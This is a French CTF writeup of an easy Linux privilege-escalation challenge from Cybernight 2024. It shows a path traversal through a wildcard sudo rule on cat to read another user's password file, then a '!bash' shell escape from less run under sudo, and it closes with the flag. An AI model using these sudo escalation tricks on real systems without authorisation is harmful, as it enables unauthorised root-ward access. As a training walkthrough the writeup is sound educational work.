Mattherix
Postes Balises Catégories
Mattherix

Contenu

Marche-Pied (1/2)

Mattherix inclus dans Writeups Cybernight 2024
   331 mots   2 minutes 

WriteUp d’un challenge créé par NozZyNozZy, dans la catégorie Système, de difficulté Facile (128 points) lors de la Cybernight 2024.

Le challenge était en 3 parties: Marche Pied, Escabot et Échelle. Il consistait en de multiple escalation de privilège.

Description

Bienvenue à cette introduction à l’escalade de privilèges sur système Linux !

Vous démarrez avec un compte symbolisé par une marche, et devez grimper les marches une par une jusqu’à arriver à la dernière disponible.

Chaque objet d’escalade possède un thème, qui vous sera utile à comprendre afin de grimper les marches !

Le marche-pied comporte trois marches : de marche1 à marche3 La dernière marche possède un flag dans ~/flag.txt

Le thème du marche-pied est : Switch User DO

Usermarche1
Passwordmarche1

Write Up

Le titre du challenge semble nous indiquer un problème de configuration de sudo.

À chaque étape on peut vérifier la liste des commandes executable avec sudo -l

Marche 2

marche1@89d28291158f:~$ sudo -l
[...]

User marche1 may run the following commands on 89d28291158f:
    (marche2) NOPASSWD: /bin/cat /home/marche2/config/*

À chaque étape, on peut vérifier la liste des commandes exécutables avec sudo -l La configuration de marche 1 et les permissions des dossiers ne nous restreignent pas dans le dossier ~marche2/config.

On peut remonter dans l’arborescence et afficher le mot de passe de la marche2 :

sudo -u marche2 /bin/cat /home/marche2/config/../remember_password.txt

su marche2
# Password: WhatAStrongPasswordFormarche2

Marche 3

marche2@89d28291158f:~$ sudo -l
[...]

User marche2 may run the following commands on 89d28291158f:
    (marche3) NOPASSWD: /bin/less /home/marche3/message.txt

On peut ouvrir un shell grâce à less :

sudo -u marche3 /bin/less /home/marche3/message.txt

# On tape !bash
Trouver des binaires vulnérables
Vous pouvez vérifier s’il est possible de lancer des commandes à partir d’un binaire Linux en regardant s’il est présent sur GTFO Bins.
marche3@a4a49ab0eaaf4c60:~$ ls
flag.txt  message.txt
marche3@a4a49ab0eaaf4c60:~$ cat flag.txt 
CYBN{...}
marche3@a4a49ab0eaaf4c60:~$ cat message.txt 
Here is an important message for everyone: I got ratioed. 
I may be absent from office for a couple of years. Thanks for your understanding.
FLAG
CYBN{Mak3_SUr3_T0_coNF1Gur3_sUD0_C0rr3C7ly}
Mis à jour le 2025-01-08
 CtfCybernightSystem
Retour | Accueil